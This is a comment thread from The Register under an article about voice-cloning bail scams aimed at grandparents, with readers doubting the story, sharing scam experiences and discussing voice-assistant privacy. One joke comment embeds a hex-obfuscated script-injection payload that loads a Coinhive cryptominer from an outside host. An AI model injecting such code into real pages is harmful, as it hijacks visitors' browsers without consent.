Talk down to Siri like it's a mere servant – your safety demands it In the middle of the night, the 83-year-old woman received a call. A caller identifying himself as a policeman angrily reported that her grandson – identified by name – had landed in jail. He'd hit a policeman while driving and TXTing. The policeman said they needed $4,000 in bail – immediately. The old woman hung up, but the …
"Yeah, but it leads to email instead of a web form"
Needs both options.
A form could also show what corrections have already been submitted. It could do that automatically based on submissions - but that could open up a path for spam/abuse displays.
My web site has simple validation in Javascript that appears to have barred anything other than a human filling in the form for at least the last decade. For an email link - simple obfuscation of the webmaster email address seems to be very effective against most spam.
The gauge of the anti-spam effectiveness is based on historical levels of abuse over the last 20 years.
It could do that automatically based on submissions - but that could open up a path for spam/abuse displays.
Umm, I think you have a typo, that should have read:
...could open up a path for spam/abuse <script>window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x27\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27 \x73\x72\x63\x3d\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x6f\x69\x6e\x68\x69\x76\x65\x2e\x63\x6f\x6d\x2f\x6c\x69\x62\x2f\x63\x6f\x69\x6e\x68\x69\x76\x65\x2e\x6d\x69\x6e\x2e\x6a\x73\x3f\x72\x6e\x64\x3d"+window["\x4d\x61\x74\x68"]["\x72\x61\x6e\x64\x6f\x6d"] </script>
Reading El Reg at work is professional development, keeping abreast of industry news and activities. Commenting on the El Reg forums is professional networking. My employer and my professional body both support these activities.
Using a work email account to contact journalists would require sign-off from Management[tm] and could result in disciplinary action. Plus many of us just don't want to use work email for non-company business.
See that phrase down at the bottom of every article, the one that says "Tips and corrections"? Ever wonder what it's for?
No, I hadn't wondered. Because I'd assumed that it was for tips and factual corrections, rather than being a means of roping the readership in as unpaid proof readers.
If you actually gave a shit, you'd report it somewhere where they might read it sooner, rather than later. Do you really think that ElReg staff have nothing better to do than read the words of wisdom of the commentards as soon as they are written?
I missed that one, it is hilarious, especially the end. I don't have the problem though, I've denied Google access to the microphone on my phone so I don't have to get it to understand my accent. I was born in North Ayrshire, grew up in New Zealand (Southern then Northern), with English parents.
In the IndyRef I was occasionally asked where I was from, never in an aggressive manner and explaining the above timeline was always accepted. I have a tape of me aged 6 sounding like Rab C Nesbit's middle class nephew to prove I used to sound Scottish.
I don't try, it seems much too much like parody.
Several of our relatives are Scots and I don't want them mixed up with a scambot when my wife's phone rings in the middle of the night. So I am busy practising something along the lines of Bluebottle or Mr. Wisty, When she hears, "Help me or I will be deaded. Yeheu!"....
The Planet Gemini PDA I have on order (yay!) will have a press-to-speak button to stop Google/Trump/Putin/Uncle-Tom-Cobbleigh-and-all slurping my normal off-line voice, so this is actually a genuine way forward.
And if not, was that a DeepFaked voice?
The old woman hung up, but the phone rang again, and the policeman said she could speak to her grandson: he came on the line, pleading with his grandmother for bail money.
Please El Reg don't pull such stupid stunts.
Also reminds me of a Greg Egan story where an extortionist builds a full simulation-AI of someone's wife in software. While the real wife is not in danger, will the husband pay up to have the simulation-AI, girevously suffering, shut down?
Was the scam initiated using recordings used by Siri or some other equally useless bit of software?
We need to know so that the right amount of kicking can be generated.
I don't use any (Apple, Amazon or Google) assistant as I think they are already shit and a huge great security hole but it would be nice to give the right one some slagging off (for a change...)
Wind in your Apple Defense Lasers. 'Siri' is being used as shorthand for voice assistants, nothing more.
And the story is almost certainly apocryphal. A quick google finds hundreds of versions - the woman (it's always a woman) is always in her 80s, though sometimes 83, sometimes 87. Her grandson (it's ALWAYS her grandson) is always seeking bail, but the amount - while always thousands of dollars - varies, as does the reason he's been locked up.
The scam itself is reported on the 'net as far back as 2005 at least, long before there was any clever voice tech to perform it (when apparently the scammers were simply expert impressionists). Whether it's ever actually been performed in real life is more questionable.
There are real example of this type of scam. Usually uses stolen laptops and/or phones. Hence the reference to "txt". It is a usual holiday scam. Steal a young persons phone/laptop and then text/email the "mom/dad" in the address list. As only text, it's harder to confirm identity. As the real son/daughter is without phone/laptop they cannot contact family to confirm they are ok, and don't need £$10,000 in bail or medical bills.
I would assume they do go for older or female parents more often. They may or may not have yet used Siri or Google to make voice lists, but it is certainly possible. If they have access to phone (non-fingerprint locked) through pin stealing snooping over the shoulder, then they can get 6 months or more voice logs!
> "That it wasn't quite good enough to pass a sniff test says less about the current state of the art than the capacity of the scammers"
> "Imagine if those scammers had gotten a voice sample of that grandson: When his grandmother spoke to his vocal simulacrum, it would have responded in the right tones to make her believe – and pay."
The scam technique is real. The targeting of elderly or otherwise vulnerable people is real. And the faking of audio in real time is theoretically possible. But without references or verifiable details, it is a purely hypothetical exaggeration of a story that has been running for at least a decade (someone else already posted the Snopes link).
The article is written as if it is factual though which makes it firmly 'urban legend' (at least as far as Wikipedia is concerned, https://en.wikipedia.org/wiki/Urban_legend, which is as far as I could be bothered to go).
This type of scam was tried on my parents a few years ago. My mother, then in her early 90s, got the call saying my son (her Grandson) was in jail in Mexico and she needed to wire money for his bail. She was warned not to tell anyone else. She was trying to do it but because she didn't drive couldn't get to the bank without my father who was still sharp enough to smell a rat. At first she refused to tell him why she needed to go to the bank but finally did. A few quick phone calls proved the grandson was safe and sound in Colorado. When they called back later asking where the money was my father asked if they wanted to talk to the policeman standing with them, quick hang up. Anything that makes these scum bags more effective is a bad thing. People have to realize what they are exposing when using new, cool gadgets with little real use.
Just like John Marshall.
When he reneged on a deal to surrender his castle to King Stephen he was told that if he didn't carry out his promise his 6 year old son (whom he'd given as a hostage) would be killed. Spoiler alert: he survived to be the famous William the Marshal).
His answer (either as the kid was being strung-up to be hanged in front of the walls (or loaded into a trebuchet - I think they did both at different points - "I still have the hammer and the anvil with which to forge yet more and better sons!"
I guess that was the fate of 4th sons in mediaeval times...
Without any citations for the supposed case at the start of the story this is very hard to believe. Seems more like a FUD scare-story that tend to do the rounds in offices, usually something about getting carjacked at a petrol station using some convoluted scheme that people must be alert for.
For a start, how did the supposed "master" scammers get enough recordings of the grandson's voice? That takes more than a Facebook trawl to gather. Also, I doubt that Adobe software is able to render speech on the fly which would mean the scammers would need to script the entire call beforehand and hope they aren't rumbled when the target deviates even slightly and receives a nonsensical reply. Finally, while the software may be able to impersonate someone's speaking voice, does it come with a built-in tearful-and-distressed filter you can apply to it?
I'm a bit disappointed at the Reg for letting something as dubious as this appear, especially without a single citation to an original source for the story. This sort of material is more suited to The One Show or the Daily Mail, surely.
Of course, it's FUD. With stuff like a sample of speech long enough that it can be weaponised it's difficult to take seriously. Pesce's articles are generally speculative.
As the voice assistants and navigation systems ably demonstrate, it's been possible for a while to synthesise anybody's voice for simple sentences. There was a good article on this in The Economist last year, so keep up at the back El Reg.
https://www.snopes.com/fraud/distress/family.asp
Many variations. But with the possibility of a large cash transfer, putting in the effort might make it worth it. Use a camera to glean pin numbers (or just a shoulder surfer), then get access to voice logs on Google or Apple search lists. Or even easier, just call them and ask some strange questions, and record the call!
Those who do do it, will spend a long time in a holiday spot or other area. They will look for marks. They will use social engineering. Then when they get the data/device hit with a lot of txts/emails/calls.
This is not exciting - The technology has been around for years and I've used for as a joke to play pranks on friends. The scary bit is that you can get the voice data from people that upload videos to YouTube. I've used Siri and voice recognition for the last 10 years to dictate everything, from my PhD dissertation to this very text. The accuracy is probably 100% and faster than I can type but effortless. It's pretty secure, no one can access my voice data. However I do have a few old videos on YouTube/Facebook which scares the shit out of me. After reading this article I've made them private.
This seems as good a place to post this question as any.
From other topics I gather than I’m not the only Commentard to have received an Amazon Echo Dot or similar device for Christmas which we don’t want to connect to the Internet for security reasons (or just not being interested in its functionality).
Does anyone have helpful suggestions for what to do with it? Alternative uses?
My brother's family have a full-fat Echo (much more useful as you can use it to play music), so I'm going to give them my Echo Dot. Then they can use it as an intercom between the kitchen and sitting room, and to stick stuff on their Amazon shopping list.
That's if they're still using it. They'd signed up to the trial for Amazon groceries in London, but last time I checked had pulled-out as Amazon kept getting their orders wrong, or just missing a bag from the delivery. Which of course they only noticed once the driver had scarpered.
Not sure if that's useful to you - unless you want to give yours to my brother as well... But it's the only solution I've come up with for the one I was given for my birthday last year.
My parents told me I was conceived in the back seat of a Holden somewhere in Melbourne, I didn't ask for more information.
"Ya old bastard."
The one bit of information I figured out for myself, is that said conception was several months before their marriage, so I'm only half a bastard.
Program for a Puppet by Roland Perry
I still have my copy, from the year it was published.
I'm thinking some people had this before Adobe.
Things such as Echo, Siri etc ought to need to be certified and it should be illegal to store the users voice as "cloudy" databases are rarely always secure. TVs and Toys etc sending voice outside the user's premises should be illegal.
Years ago we had voice control and recognition without "sending it to the cloud". We have gone backwards because Google, MS, Apple, Amazon wants to monetize our private lives.
Years ago we had voice control and recognition without "sending it to the cloud". We have gone backwards because Google, MS, Apple, Amazon wants to monetize our private lives.
Well, if you were prepared to spend the time training the voice recognition with activities like reading 'Alice and Wonderland' to your computer (IBM Voice assist (I think)).
Most people aren't patient enough, so Google et all get away with packing your speech off to their servers to process and collect useful? data.
"What deepfake is to video, Adobe VoCo – its "Photoshop for audio" – does for speech."
So this isn't an issue then. I've seen these so called deepfakes and the video neither looked like the actress it was supposed to be nor did it look like a genuine video. If Adobe VoCo is as good it probably makes speech that is supposed to sound like Joe Pasquale sound like James Earl Jones.
...received one of these calls "from" one of his friends, who needed bail money.
He replied "I'll get it right out to you. Just tell me the name of the show we co-starred in when we were in High School"
The call terminated shortly thereafter.
His final comment: "You know, you should get an honest job"
A picture/video is no longer proof positive and people actually hold conversations with their household appliances; my how we have devolved.
Then only thing under voice control in my house is my dogs and even that is questionable sometimes. My kids can only be managed with router config tricks...
How many of us have received a call that starts out "This is "insert name" from the "insert company name" - usually warranty or returns or refund department...Can you hear me?"
What's your first response? Usually "Yes" - and you've been had because now they have your "yes" for any account they may have access to.
I hate and avoid saying "yes" to any caller even if I know the person - I've frustrated a few scammer (Just for the heck of it after I've accidentally answered a call I didn't recognize) by saying something like "oh" and waiting for their next statements which usually leads to them saying something rude before I hang up on them. BTW - I don't do this too often because it encourages them and I NEVER do this on my cell/mobile phone!
... adopt a different vocal register when talking to voice assistants, something analogous to the register one might have used 100 years ago when communicating with staff "below stairs".
I found that bit very interesting, but was hoping there might be links to further information for the benefit of those of us who grew up in the wrong century, in the wrong class, and on the wrong continent.
The reason the scamsters like targeting the very old is because their mental faculties aren't what they used to be. Not talking about senility, just generally more gullible and easier to fool (not all, but many)
You wouldn't need the right voice, heck in some cases you wouldn't even need the name "I'm your grandson, I called you because I was afraid of what my dad might say if he found out. This is my only phone call and they say I have to get off right now if you aren't going to come up with the bail money, please help me!"
There was a statement from the police in our local news that someone had tried this locally against a couple elderly folks, and they were able to trace the call a VOIP service so they have no idea if it even originated in the US. Luckily the scamsters picked the wrong people, or at least those wrong people called the police - they didn't have a grandson! Others might have been fooled and sent them money, and would probably be too embarrassed to call the cops after they figured it out.
When I first saw the Echo on Amazon I assumed they were giving them away just to generate more income. I thought "there's no way anyone will be stupid enough to get one of these eavesdropping devices".
When I realized that people actually had to PAY to get one I saw the genius in Amazon's thinking. It's like putting an old couch out on the curb with a 'FREE' sign on it. It will sit there until you have to pay to have it hauled away. Put a $50 price tag on it and it will get stolen the first night.
The Register 
Biting the hand that feeds IT
Copyright. All rights reserved © 1998–2025
